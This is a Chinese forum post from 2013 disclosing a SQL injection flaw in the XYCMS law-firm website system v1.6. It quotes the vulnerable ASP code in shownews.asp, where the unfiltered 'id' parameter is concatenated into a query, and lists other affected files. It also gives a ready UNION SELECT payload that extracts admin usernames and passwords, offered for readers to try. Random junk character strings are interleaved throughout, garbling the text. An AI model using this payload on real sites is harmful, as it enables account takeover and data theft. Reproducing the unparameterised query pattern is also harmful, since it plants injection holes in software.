前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
9 t: T% L2 Q, t [* p+ O* s8 H 2 @2 H. c2 ?$ n/ K% }& {+ F
淫荡分割线( F6 ~0 x" o% d# Q
--------------------------------------------------------8 C8 e/ C' w1 q: @! { w( _+ T9 l
6 l& m" [8 E5 C) [/ v6 e审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测) A0 q! P3 W* E0 D7 ]; j& t, S1 s; {# }
源码地址:http://down.chinaz.com/soft/29233.htm
) u+ C0 F: l+ A: y ' {9 s$ A6 T. U7 o; g9 a
漏洞文件:shownews.asp7 U) ^; u/ K2 g) F! O* @6 @& V
漏洞代码:7-13行
9 H+ B8 Q$ n9 _, B6 [ 0 V: C+ c; u s9 w7 n. y8 H1 Q
! x1 L) ~8 c5 m$ R6 ?% L
<%
* \/ ]' q+ [$ ^2 h+ M4 _id=request.QueryString("id")
4 g) q9 q7 }' V8 e 7 P9 c' b6 F& q
set snews=server.createobject("adodb.recordset") " V) W: b0 d! C
exec="select * from [news] where id="&id# k$ F4 \: o W, `& Z
snews.open exec,conn,1,1
- M/ [' \6 j$ R' h& \9 V%>5 p3 C! P$ L, }8 c+ C
+ l9 z& N6 d# p# D8 G4 o
A9 } l9 E) [' ?$ \- e什么过滤都没有 直造成注入. y; z& V& o) {3 @ C
- G9 ?9 e6 t" |/ r8 E! Y
注入点:http://127.0.0.1:99/shownews.asp?id=xx! \/ t( s% k/ Z: U" y+ T
8 j0 M+ Q1 ~; X" h其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
- v( `1 [% R1 j6 K, {8 t D 3 N9 t: T+ p' w
% C3 k/ V5 z. d' e- _exp: union select 1,admin,password,4,5,7 from admin_user$ G1 _. {0 I; e1 o5 T D
# R/ [! K+ `% n, X3 c/ E) }4 E# n
|
发表于 2013-4-4 17:28:12
收藏
支持
反对